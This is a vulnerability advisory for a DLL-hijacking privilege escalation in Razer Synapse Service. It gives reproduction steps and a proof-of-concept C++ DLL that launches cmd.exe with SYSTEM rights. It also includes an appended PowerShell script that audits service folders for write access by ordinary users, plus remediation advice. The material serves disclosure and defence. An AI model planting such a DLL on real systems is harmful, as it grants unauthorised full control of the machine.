Discovered by: Juan Sacco

Razer Synapse Service v1.0.0 is prone to DLL injection because it fails to properly filter user-supplied input and loads a .DLL from %ProgramData%, which is writable from userland, with SYSTEM rights. This allows a regular user to escalate privileges to SYSTEM.

Program: Razer Synapse Service
Version: 1.0.0
Vendor: https://www.razer.com/
Download link: https://www.razer.com/downloads

Steps To Reproduce:

Move your .DLL to C:\ProgramData\Razer\Synapse3\Service\Bin\HID.dll
Restart the PC or restart the service. The service runs with SYSTEM rights.
Enjoy your privilege escalation!

Supporting Material/References:

ProgramData specifies the path to the program-data folder (normally C:\ProgramData). Unlike the Program Files folder, this folder can be used by applications to store data for standard users, because it does not require elevated permissions.

Reference: https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-8.1-and-8/ff716245(v=win.10)?redirectedfrom=MSDN#feedback

Razer Synapse Service.exe loads a DLL (HID.dll) from the ProgramData\Razer\Synapse3\Service\ folder with the function "HidD_GetHidGuid()". Using the following code, we can compile a DLL and export this function from it so that it is called during attach.

    // dllmain.cpp : Defines the entry point for the DLL application.
    #include "pch.h"
    #include "windows.h"

    BOOL APIENTRY DllMain( HMODULE hModule,
                           DWORD  ul_reason_for_call,
                           LPVOID lpReserved
                         )
    {
        char cmd[] = "cmd.exe /c";

        switch (ul_reason_for_call)
        {
        case DLL_PROCESS_ATTACH:
            WinExec(cmd, SW_SHOWNORMAL);
            ExitProcess(0);
        case DLL_THREAD_ATTACH:
            WinExec(cmd, SW_SHOWNORMAL);
            ExitProcess(0);
        case DLL_THREAD_DETACH:
            WinExec(cmd, SW_SHOWNORMAL);
            ExitProcess(0);
        case DLL_PROCESS_DETACH:
            WinExec(cmd, SW_SHOWNORMAL);
            ExitProcess(0);
            break;
        }
        return TRUE;
    }

    extern "C" __declspec(dllexport) void HidD_GetHidGuid()
    {
        char cmd[] = "cmd.exe /c";
        WinExec(cmd, SW_SHOWNORMAL);
    }

Impact:

A regular user could abuse this vulnerability to gain full SYSTEM rights.
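
A defensive check for the condition described in this advisory, as an added example that is not part of the original advisory or of Razer's code: it lists access-control entries that let standard-user principals create or modify files in the folder named above and, going beyond that one path, in the binary folder of every service running as LocalSystem. The SID list, the write mask and the function name Get-LowPrivWriteAce are assumptions chosen for illustration.

```powershell
# Added example, not from the advisory: report directories where a
# low-privileged principal can create or modify files.
$LowPrivSids = @{
    'S-1-1-0'      = 'Everyone'
    'S-1-5-11'     = 'Authenticated Users'
    'S-1-5-32-545' = 'BUILTIN\Users'
    'S-1-5-4'      = 'INTERACTIVE'
}
# WriteData (add file) | AppendData (add subdirectory) | GENERIC_WRITE | GENERIC_ALL
$WriteMask = 0x2 -bor 0x4 -bor 0x40000000 -bor 0x10000000

function Get-LowPrivWriteAce {
    param([Parameter(Mandatory)][string]$Directory)
    if (-not (Test-Path -LiteralPath $Directory -PathType Container)) { return }
    $acl     = Get-Acl -LiteralPath $Directory
    $sidType = [System.Security.Principal.SecurityIdentifier]
    # Explicit and inherited ACEs, with identities returned as SIDs.
    foreach ($ace in $acl.GetAccessRules($true, $true, $sidType)) {
        $sid = $ace.IdentityReference.Value
        if ($ace.AccessControlType -ne 'Allow') { continue }
        if (-not $LowPrivSids.ContainsKey($sid)) { continue }
        if (([int]$ace.FileSystemRights -band $WriteMask) -eq 0) { continue }
        [pscustomobject]@{
            Directory = $Directory
            Principal = $LowPrivSids[$sid]
            Rights    = $ace.FileSystemRights
            Inherited = $ace.IsInherited
        }
    }
}

# The directory named in the advisory, plus (generalisation) every directory
# that holds the binary of a service running as LocalSystem.
$dirs = @('C:\ProgramData\Razer\Synapse3\Service\Bin')
foreach ($svc in Get-CimInstance Win32_Service -Filter "StartName='LocalSystem'") {
    # PathName may be quoted and may carry arguments; keep the path up to the first .exe
    if ($svc.PathName -match '^\s*"?(.+?\.exe)') {
        $dirs += Split-Path -Parent $Matches[1]
    }
}

$dirs | Sort-Object -Unique |
    ForEach-Object { Get-LowPrivWriteAce -Directory $_ } |
    Format-Table -AutoSize
```

Any row returned for a folder used by a SYSTEM service means a standard user can place or replace a DLL there. Restricting write access on that folder to administrators and SYSTEM, or installing the service under Program Files, removes the condition.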